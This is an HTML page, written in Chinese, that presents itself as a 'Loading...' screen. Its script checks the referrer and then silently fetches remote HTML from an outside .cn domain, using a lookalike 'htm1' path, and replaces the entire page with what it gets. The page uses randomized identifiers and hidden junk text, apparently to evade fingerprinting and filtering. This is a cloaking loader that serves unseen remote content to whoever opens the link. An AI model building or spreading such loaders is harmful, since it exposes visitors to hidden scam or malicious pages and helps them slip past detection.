<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .kS442Ib {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .kS442Ib .tcHIpz {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .kS442Ib .content {
            line-height: 50px;
            text-align: center
        }

        .kS442Ib .img {
            width: 100%
        }

        .kS442Ib .hkeeLwCE5V {
            text-align: center
        }

        .kS442Ib .hkeeLwCE5V span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .kS442Ib .hkeeLwCE5V span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .kS442Ib .hkeeLwCE5V span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .kS442Ib .hkeeLwCE5V span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .kS442Ib .hkeeLwCE5V span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .kS442Ib .hkeeLwCE5V span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .kS442Ib .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function wdSk6Mwzbf(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var URcwQ5 = wdSk6Mwzbf('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ URcwQ5 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ URcwQ5 +".html?a=share";
		}
		
        XRwc7MZVLO=url+"#"+new Date().getTime();
        XRwc7MZVLO && function() {
            $.get(XRwc7MZVLO, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<a  href='#' style='display:none'>nqNnWQGsClm0c3W9YyjFuiKCc0VE1AV1tOcLF8wZV7Cg64UDRlZSXtKBezvjmwBX6NLIOzw58NoffcuV1rDKaqfFa4</a>
<h1 style='display:none' >YoW9VvjiRZZ1MXX3pkKWDIZZaXsYyG3iBzKAmbkzwjdqE4kTAiSeJihuswQw4le0PK4</h1>
<b style='display:none' >PlRlEoEPrtRYcuOmK8Udxgt</b>
<h1 style='display:none' >YoW9VvjiRZZ1MXX3pkKWDIZZaXsYyG3iBzKAmbkzwjdqE4kTAiSeJihuswQw4le0PK4</h1>
<b style='display:none' >PlRlEoEPrtRYcuOmK8Udxgt</b>
<b style='display:none' >PlRlEoEPrtRYcuOmK8Udxgt</b><div class="kS442Ib">
    <div class="tcHIpz">
        <div class="hkeeLwCE5V">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >ylnuKt7lYtJXMExBrVYapC2Mg</li>
<a  href='#' style='display:none'>XL4s9GF3lggwZjAB4W</a>
<div style='display:none'>TGycnfyEKgogMSEeURWYfikRyrJXKHxMzulp0</div>
<span style='display:none'>yqmphkalSnEdIFbT2mOgL1P3OaTqy48taSbM4uJp1gJZmG8MxsOdof07n6osvowBLDPyI4at</span></body>
</html>